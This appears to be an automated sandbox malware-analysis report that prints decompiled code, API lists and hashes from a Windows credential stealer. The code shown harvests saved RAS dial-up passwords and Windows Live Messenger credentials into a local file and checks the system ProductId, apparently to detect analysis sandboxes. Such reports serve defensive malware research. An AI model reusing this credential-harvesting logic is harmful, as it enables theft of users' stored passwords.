						_v36 = 0xffffffff;
						_t138 = _v20 - 1;
						if(_t138 >= 0) {
							_v52 = _t138 + 1;
							_t256 = 0;
							do {
								_v1252 = 0x41c;
								_t214 = (_t256 << 5) + _t256;
								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
								_push( &_v36);
								_push( &_v1252);
								_push(0);
								L00407B8C();
								_v12 = 0x6e8;
								E00401414( &_v3020, _v12);
								_v3020 = _v12;
								_t222 =  &_v3020;
								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
									if( *_v28 != 0) {
										L15:
										E00401CAC( &_v40,  &_v1248);
										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
										_t167 = E00401F9C( &_v28);
										_t253 = E00401F48(_v40);
										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
										if(_t215 == 0) {
											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
										}
										if(_t215 == 0) {
											_t190 = E00401F9C( &_v28);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
										}
										if(_t215 == 0) {
											_t185 = E00401F9C( &_v32);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
										}
										if(_t215 > 0) {
											E00402BC0( &_v3284, _t215, 0);
											E00401D18( &_v48,  &_v3284, 0);
											_t254 = 0x100;
											_t216 = 0x40e9bc;
											do {
												E00401E94( *_t216, _v48);
												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
													_t87 = _t216 + 4; // 0x0
													_push(E00401D50( *_t87));
													_t88 = _t216 + 4; // 0x0
													_t181 = E00401F48( *_t88);
													_pop(_t223);
													E00408038( &_v476, _t223, _t181);
												}
												_t216 = _t216 + 8;
												_t254 = _t254 - 1;
											} while (_t254 != 0);
										}
									} else {
										_t274 =  *_v32;
										if( *_v32 != 0) {
											goto L15;
										}
									}
								}
								if( &_v733 != 0 &&  &_v476 != 0) {
									_push( *_v8);
									_push("RAS Passwords |");
									E00401CAC( &_v3288,  &_v733);
									_push(_v3288);
									_push(0x40865c);
									E00401CAC( &_v3292,  &_v476);
									_push(_v3292);
									_push(0x40865c);
									_push(0x408668);
									E00401E10();
								}
								_t256 = _t256 + 1;
								_t100 =  &_v52;
								 *_t100 = _v52 - 1;
							} while ( *_t100 != 0);
						}
					}
				}
				_pop(_t225);
				 *[fs:eax] = _t225;
				_push(E00408622);
				E00401AE4( &_v3292, 2);
				E00401AE4( &_v3028, 2);
				E00401AE4( &_v48, 3);
				E00401AE4( &_v32, 2);
				_t230 =  *0x408214; // 0x408218
				return E00402FC8( &_v24, _t230);
			}












































                                    0x00408238
                                    0x00408238
                                    0x00408238
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408295
                                    0x0040829e
                                    0x004082ad
                                    0x004082bd
                                    0x004082c2
                                    0x004082c8
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x00408300
                                    0x0040830d
                                    0x00408319
                                    0x00408324
                                    0x00408326
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x00408345
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408379
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408391
                                    0x0040839b
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b9
                                    0x004083cd
                                    0x004083d5
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083f6
                                    0x004083fe
                                    0x00408415
                                    0x0040841d
                                    0x00408429
                                    0x00408442
                                    0x00408450
                                    0x00408459
                                    0x00408464
                                    0x0040846c
                                    0x00408481
                                    0x00408489
                                    0x0040848d
                                    0x004084a5
                                    0x004084a5
                                    0x004084a9
                                    0x004084ae
                                    0x004084c9
                                    0x004084c9
                                    0x004084cd
                                    0x004084d2
                                    0x004084ed
                                    0x004084ed
                                    0x004084f1
                                    0x004084ff
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x00408521
                                    0x00408526
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x0040853a
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x0040855b
                                    0x0040856a
                                    0x0040856c
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085b6
                                    0x004085b6
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c7
                                    0x004085ca
                                    0x004085cd
                                    0x004085dd
                                    0x004085ed
                                    0x004085fa
                                    0x00408607
                                    0x0040860f
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409D28, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _t47;
				intOrPtr* _t70;
				void* _t74;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t90;
				void* _t91;
				intOrPtr _t93;

				_t89 = __esi;
				_t70 = __eax;
				 *[fs:eax] = _t93;
				E00401AC0(__eax);
				_v16 = LoadLibraryA("advapi32.dll");
				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
				if(_v12 != 0) {
					_t47 = _v12 - 1;
					if(_t47 >= 0) {
						_v20 = _t47 + 1;
						_t90 = 0;
						do {
							_push( *_t70);
							_push("Messenger|");
							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
							_push(_v24);
							_push(0x409edc);
							E00401E10();
							_push( *_t70);
							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
							_push(_v32);
							_push(0x409edc);
							E00401E10();
							E00401CAC(_t70, E00401F48(_v28));
							_t90 = _t90 + 1;
							_t21 =  &_v20;
							 *_t21 = _v20 - 1;
							_t97 =  *_t21;
						} while ( *_t21 != 0);
					}
					FreeLibrary(_v16);
					_push(E00401D50( *_t70));
					E00406008( &_v36);
					E00401D58( &_v36, "xxxyyyzzz.dat");
					_pop(_t74);
					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(E00409E78);
				E00401AE4( &_v36, 4);
				_t78 =  *0x409bec; // 0x409bf0
				return E00402FC8( &_v8, _t78);
			}



















                                    0x00409d28
                                    0x00409d38
                                    0x00409d45
                                    0x00409d4a
                                    0x00409d59
                                    0x00409d6a
                                    0x00409d7d
                                    0x00409d91
                                    0x00409d9b
                                    0x00409da4
                                    0x00409da7
                                    0x00409daa
                                    0x00409dad
                                    0x00409daf
                                    0x00409daf
                                    0x00409db1
                                    0x00409dc2
                                    0x00409dc7
                                    0x00409dca
                                    0x00409dd6
                                    0x00409ddb
                                    0x00409de6
                                    0x00409deb
                                    0x00409dee
                                    0x00409dfb
                                    0x00409e0c
                                    0x00409e11
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409daf
                                    0x00409e1b
                                    0x00409e27
                                    0x00409e2b
                                    0x00409e38
                                    0x00409e42
                                    0x00409e43
                                    0x00409e43
                                    0x00409e4a
                                    0x00409e4d
                                    0x00409e50
                                    0x00409e5d
                                    0x00409e65
                                    0x00409e70

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040806C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t44;
				intOrPtr _t51;

				_push(0);
				_push(0);
				_t48 = __eax;
				_push(_t51);
				_push(0x408182);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				if( *0x40d094 != 0) {
					if( *0x40d098 == 0) {
						E00401D9C( &_v12, 0x4081ac, __eax);
						_t11 = E00401F48(_v12);
						_t12 =  *0x40e9b8; // 0x0
						GetProcAddress(_t12, _t11);
					} else {
						_t18 = E00401F48(__eax);
						_t19 =  *0x40e9b8; // 0x0
						GetProcAddress(_t19, _t18);
					}
					L11:
					_pop(_t44);
					 *[fs:eax] = _t44;
					_push(E00408189);
					return E00401AE4( &_v12, 2);
				}
				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
				if( *0x40e9b8 == 0) {
					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
					L5:
					if( *0x40e9b8 != 0) {
						_t24 = E00401F48(_t48);
						_t25 =  *0x40e9b8; // 0x0
						if(GetProcAddress(_t25, _t24) != 0) {
							 *0x40d094 = 1;
							 *0x40d098 = 1;
						}
					}
					goto L11;
				}
				E00401D9C( &_v8, 0x4081ac, _t48);
				_t30 = E00401F48(_v8);
				_t31 =  *0x40e9b8; // 0x0
				if(GetProcAddress(_t31, _t30) == 0) {
					goto L5;
				} else {
					 *0x40d094 = 1;
					goto L11;
				}
			}















                                    0x0040806f
                                    0x00408071
                                    0x00408075
                                    0x00408079
                                    0x0040807a
                                    0x0040807f
                                    0x00408082
                                    0x0040808e
                                    0x00408129
                                    0x0040814c
                                    0x00408154
                                    0x0040815a
                                    0x00408160
                                    0x0040812b
                                    0x0040812d
                                    0x00408133
                                    0x00408139
                                    0x0040813e
                                    0x00408167
                                    0x00408169
                                    0x0040816c
                                    0x0040816f
                                    0x00408181
                                    0x00408181
                                    0x0040809e
                                    0x004080aa
                                    0x004080eb
                                    0x004080f0
                                    0x004080f7
                                    0x004080fb
                                    0x00408101
                                    0x00408110
                                    0x00408112
                                    0x00408119
                                    0x00408119
                                    0x00408110
                                    0x00000000
                                    0x004080f7
                                    0x004080b6
                                    0x004080be
                                    0x004080c4
                                    0x004080d3
                                    0x00000000
                                    0x004080d5
                                    0x004080d5
                                    0x00000000
                                    0x004080d5

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404460, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				void* _t8;
				struct HRSRC__* _t15;
				void* _t16;
				long _t22;
				void* _t24;

				_t24 = __eax;
				_t2 =  *0x40e670; // 0x400000
				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
				_t4 =  *0x40e670; // 0x400000
				_t22 = SizeofResource(_t4, _t15);
				_t6 =  *0x40e670; // 0x400000
				_t16 = LoadResource(_t6, _t15);
				_t8 = LockResource(_t16);
				_t23 = _t8;
				if(_t8 != 0) {
					E00402074(_t24, _t22 - 1);
					E00403730(E00401F9C(_t24), _t23);
					return FreeResource(_t16);
				}
				return _t8;
			}











                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405334, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405334() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}







                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • ProductId, xrefs: 0040536B
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
